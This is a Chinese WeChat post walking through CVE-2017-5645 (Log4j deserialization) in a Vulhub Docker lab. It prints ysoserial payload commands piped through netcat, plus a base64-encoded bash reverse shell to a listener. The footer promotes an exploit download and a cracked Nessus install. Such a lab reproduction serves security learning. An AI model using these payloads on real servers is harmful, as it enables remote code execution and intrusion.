免责声明
本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
漏洞概述
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
环境搭建
Vulhub搭建参考如下:
进入到vulbub靶场的/vulhub/log4j/CVE-2017-5645目录
使用命令:docker-compose up -d #启动镜像,整个过程比较久,耐心等待
测试连通性
进入容器
docker-compose exec log4j bash
ls /tmp 查看当前文件情况,用于后续确认远程命令执行是否执行成功
生成payload进行攻击
使用ysoserial生成payload,然后直接发送给192.168.0.140:4712
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc.exe 192.168.0.140 4712
通过docker命令行可以看到生成了success文件夹
开启监听
nc.exe -lvvp 9999
将 /bin/bash -i >& /dev/tcp/192.168.0.1/9999 0>&1 进行base64编码
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==
反弹shell
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" | nc.exe 192.168.0.140 471
沉住气,不要急!!!
得到反弹shell,success
获取exp
关注浪飒sec回复
221108
获取exp下载地址
历史推荐
Ubuntu 20.04 离线安装破解 Nessus 10.3.0
超全Hack报告/资料/文档/书籍(不关注我你必后悔的好东西)
原文始发于微信公众号(浪飒sec):漏洞复现——CVE-2017-5645
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论